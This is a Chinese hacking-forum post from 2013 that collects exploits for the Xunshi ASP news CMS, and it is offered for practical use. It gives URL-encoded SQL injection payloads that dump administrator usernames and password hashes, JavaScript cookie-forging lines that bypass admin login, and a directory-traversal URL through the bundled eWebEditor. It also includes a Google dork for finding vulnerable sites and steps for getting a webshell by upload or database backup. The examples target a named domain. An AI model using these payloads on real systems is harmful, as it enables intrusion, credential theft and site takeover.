找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2531|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘+ C" p5 O' n7 H8 p

  p; W( \$ k. \- n- P% C0 V: A  ~在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
* Y; k& U9 H; ?: v+ d
- F( z7 {* r/ o3 ?$ V- c! @以下本文总结来自黑防去年第9期杂志上的内容...4 h5 M( h5 Y* `; r

9 {$ c- w: ?8 V先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%+ j0 w  q/ z, l8 v6 v

. A4 R7 F2 ]1 A- m. x- }26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
0 n. k1 S3 t: o* C/ T/ p4 b
$ R$ ^& {2 r+ l2 y% Y, ?记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
% b1 \' X. [8 \* p$ }; x" v7 P这里一个注入5 A) \6 {& V5 X

/ e4 H1 L2 r# u$ C$ d; x效果如图:' |1 N# M( ?( _9 E* I- K, Z

6 T- z& k5 ]2 x ( p. d5 k+ a  ?9 u( w% ?+ C

8 m' K; `8 `7 P; S) I0 u+ g这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
4 D  |" M' o& L8 _) w) B2 c. O# \2 i- r
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
; U+ V: _/ d+ k: ]$ X1 Z4 q5 S8 N$ C0 f  L
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
/ [: R, P4 y& K9 G8 Z6 m
$ z$ A& k/ j* X8 X  V* H: T那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:: ?2 r# B1 b' z# l4 U1 E4 i' o9 ?

: q. n& ?( u' [2 l因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞' W- T5 {* h% L# k& Y
6 ?% N8 j5 @, z3 L- ]& ?
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
6 G2 O' [6 t; e; [) R+ s. r! {8 }# ~' p# x# S# r, Q
访问这页面来列目录..步骤如下:& b* R. R$ a3 ]9 W! g$ ^1 ?4 L

$ [4 b9 V& r& K. m! s( p) x0 U& Hjavascript:alert(document.cookie="admindj=1")
1 x7 k/ e# z; ]; {7 g: a
' _7 {* g/ b% n5 Thttp://www.political-security.co ... asp?id=46&dir=../..
0 Q1 r; E' R: b0 _) Q: r/ g- _1 D7 V( B* M( \3 m. N! U+ C
效果如图:
- A# H8 G/ Y( `( u( ~
7 e# D8 Q5 ^/ U+ Q, [% C/ T & t! Q: ]6 [1 Y( X3 n
: D5 E; [: e) @$ ?' y" u. G4 c7 e
这样全站目录都能瞧了..找到后台目录..进去..) ]- ^. {8 @; a1 ]

& F* n( q: C0 ^$ R# B, \那么进了后台怎么拿shell??上传--备份就ok了.., e7 W3 b# X( |* \0 a. R* q

% i9 \8 a# Z. j" J3 ?- V那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
4 B# z$ R4 D% a. {. i9 |; N& V: ]/ _& r* `1 m+ F- h. ?8 U
这个我也碰到过一次..你都可以通过列目录来实现..
7 Y# D$ Y' \# _
+ _* D5 ^' \1 s( y) H; M( ]javascript:alert(document.cookie="admindj=1") & q6 u/ z% ^* W5 Q8 ^( r3 x1 n

; T& s4 }* K6 Q4 X) N, K8 V* bhttp://www.political-security.co ... p?action=BackupData
: Y, w& Y+ D, m/ f3 ^+ H3 o/ b% ?$ s( T6 k* R/ H
备份ok..* d2 w: W/ q' ?2 _

& `' ?5 ]3 X5 u. m" b+ R: P  I那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
% _5 e5 r: _, K) t6 z( |
# [) L  K) L7 X* t1 P* K$ s6 X在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
- r, k+ h% o" @2 j1 D. O+ c7 c0 g" ?  T* L- n( O: t
然后访问此页面进行注入..步骤如下:# d, ~2 a  \+ w* \

7 N0 J  [2 W4 }javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
! h& D3 g. ^# L8 E
. f; |1 H1 o1 X, \$ d) m2 m3 S" v然后请求admin/admin_chk.asp页面
: A( ~9 j& ?8 C) i5 J/ I+ ~7 ~4 J# H& q: j9 o2 s
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
3 Q) V; ?) z' Y6 R7 b: b. I" ?- f/ _6 @+ n2 n6 F
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
! G; y. k! a4 |) n4 z  c2 j% |4 p9 N3 ~8 o( X0 n  h
效果如图所示:
; U% I2 m* {& Z" ~; e5 r' o; B5 g( }; u2 T% O% J
  ^/ T0 u  R) q% W2 p
& C' i# _, N4 ^; x7 P$ b
讯时漏洞2  T% ]1 q( _- }
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)& w: u5 G5 }8 n6 ~0 C3 L- Z
# T+ h. T8 e. e: p- d( A
1、/admin/admin_news_pl_view.asp?id=1
% ?* U0 \+ u, N) r9 a1 D7 k//id任意 填入以下语句
1 J6 f3 {) @. y6 c 7 r4 r) n9 [/ s$ _; ?
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!2 y) v( Q; w' ~4 `

; h5 v  t8 S) ~6 e% h3 q. k" ]) K* _% I& b

  d3 {+ ]+ B& P& b3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
3 H5 f+ `& `8 T  S+ C) \
# R; D! z  V+ [8 X( ?  D* Z) \+ ^% Y" Y  t% Q

$ C8 ~" U3 U2 L# Z/ x- K爆出管理员帐号和密码了
6 {. k- i. H+ S& K9 M9 Y, q& B
' X( e7 I* S9 J5 K- @9 b3 R. n2 b- Q- x5 }" x7 u
1 `" K8 e! z* T8 H2 k) E
4、cookies进后台
3 t% X( G7 Q8 [7 s2 V' _+ ]
) `- S' T6 U. W3 j. ]: ejavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));" A% E3 |% {0 r: O! I: H  R2 P
" A7 s; B/ _' c3 v' F" E7 I+ G2 y

- Y" d" B. P5 r1 ^# ]# q, c& ~4 Y& c  B
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
# O! b* O7 I$ U3 I( R4 J( k* g1 { . n! t1 d& N. h) U
6 s5 w* [6 F' h; S0 k% C3 |
/ f) X0 e2 h0 o* |4 i9 e
6、后台有上传和备份取SHELL不难。
: v' A6 r( P2 X0 a4 x7 P
& }2 G( B6 m6 C3 D+ `( }" ~2 E7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..0 r- a" y4 Q4 O* t# v6 A* ?$ Y" I
* R3 X8 i" E5 X% H0 }9 C
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!+ m9 F* I2 z: R; s9 ]" ]# y( p
- U9 W. s  U: {: ~
: u0 b  x9 ?! n7 i' V

6 l, [9 a% r' l1 t) I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表